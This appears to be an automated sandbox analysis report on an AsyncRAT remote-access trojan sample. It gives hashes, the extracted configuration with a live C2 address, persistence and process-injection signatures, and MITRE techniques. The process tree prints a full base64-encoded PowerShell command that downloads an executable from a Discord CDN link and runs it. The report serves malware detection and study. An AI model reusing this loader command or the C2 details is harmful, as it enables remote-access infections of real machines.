Overview

overview

10

Static

static

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    17-12-2022 07:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    16c2fcaa5e005e11b6d8d31ed19e33dd7038290c4544e0dd2c3f61e9980350f7.exe

  • Size

    6KB

  • MD5

    6a244b5702240177bfb14ea0acf83766

  • SHA1

    e6a432e8c6a4eeb939324871c665fe0f87a5a9ab

  • SHA256

    16c2fcaa5e005e11b6d8d31ed19e33dd7038290c4544e0dd2c3f61e9980350f7

  • SHA512

    18b5f212affedf093fb745718f62cf49840749c6044952aa0553e81058f98a2c894f0b58911196826118564936a429aeec65a0ca6f1650f8915b0457fc16d0b6

  • SSDEEP

    96:Q79rLL1bhycG8W2mO8YKNXJnk538t/8nBRt9Tgd3oj9mrl:29rLL1bhych87NXJnu38t/8nHEdA2

Score
10/10
asyncratwindowsdefendersmarttscreenpersistencerat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

WindowsDefenderSmarttScreen

C2

217.64.31.3:9742

Mutex

WindowsDefenderSmarttScreen

Attributes
  • delay

    1

  • install

    false

  • install_file

    WindowsDefenderSmarttScreen.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\16c2fcaa5e005e11b6d8d31ed19e33dd7038290c4544e0dd2c3f61e9980350f7.exe
    "C:\Users\Admin\AppData\Local\Temp\16c2fcaa5e005e11b6d8d31ed19e33dd7038290c4544e0dd2c3f61e9980350f7.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZgBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADIAMQA1ADMAOQA1ADEAMAA2ADUAMgAyADcAMgA2ADQALwAxADAANQAyADEANQA0ADYAOAA4ADIAOAAxADIANQA1ADkAOQA3AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAZAB2AHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB0AGYAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAYQBzAGEAZAAyADEAMQAzAC4AZQB4AGUAJwApACkAPAAjAHUAaQBkACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGMAbgB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAHYAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAYQBzAGEAZAAyADEAMQAzAC4AZQB4AGUAJwApADwAIwBxAHAAeQAjAD4A"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Users\Admin\AppData\Roaming\asasad2113.exe
        "C:\Users\Admin\AppData\Roaming\asasad2113.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        PID:3496

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\asasad2113.exe
    Filesize

    4.2MB

    MD5

    b60e44033994d1fde9a4b6f1338bfa04

    SHA1

    7f2cd8091276040ca011174269112099ec3e9bef

    SHA256

    baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e

    SHA512

    a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574

    Download Submit
  • C:\Users\Admin\AppData\Roaming\asasad2113.exe
    Filesize

    4.2MB

    MD5

    b60e44033994d1fde9a4b6f1338bfa04

    SHA1

    7f2cd8091276040ca011174269112099ec3e9bef

    SHA256

    baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e

    SHA512

    a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574

    Download Submit
  • memory/3496-173-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-156-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-144-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-145-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-146-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-175-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-148-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-149-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-150-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-152-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-153-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-154-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-155-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-176-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-157-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-158-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-159-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-160-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-161-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-162-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-163-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-164-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-165-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-166-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-167-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-177-0x0000000000D30000-0x000000000115E000-memory.dmp
    Filesize

    4.2MB

    Download
  • memory/3496-169-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-170-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-171-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-172-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-140-0x0000000000000000-mapping.dmp
    Download
  • memory/3496-174-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-147-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-142-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-168-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-178-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-179-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-180-0x00000000059C0000-0x0000000005A5C000-memory.dmp
    Filesize

    624KB

    Download
  • memory/3496-181-0x0000000005F60000-0x000000000645E000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/3496-182-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-183-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-184-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-185-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-186-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-187-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-188-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-189-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-190-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-191-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-192-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-193-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-194-0x00000000059B0000-0x00000000059C2000-memory.dmp
    Filesize

    72KB

    Download
  • memory/3496-195-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-196-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-197-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-198-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-199-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-200-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-201-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-202-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/3496-203-0x00000000778F0000-0x0000000077A7E000-memory.dmp
    Filesize

    1.6MB

    Download
  • memory/4988-116-0x0000000000B90000-0x0000000000B98000-memory.dmp
    Filesize

    32KB

    Download
  • memory/5024-117-0x0000000000000000-mapping.dmp
    Download
  • memory/5024-122-0x000002ADF1910000-0x000002ADF1932000-memory.dmp
    Filesize

    136KB

    Download
  • memory/5024-125-0x000002ADF1AC0000-0x000002ADF1B36000-memory.dmp
    Filesize

    472KB

    Download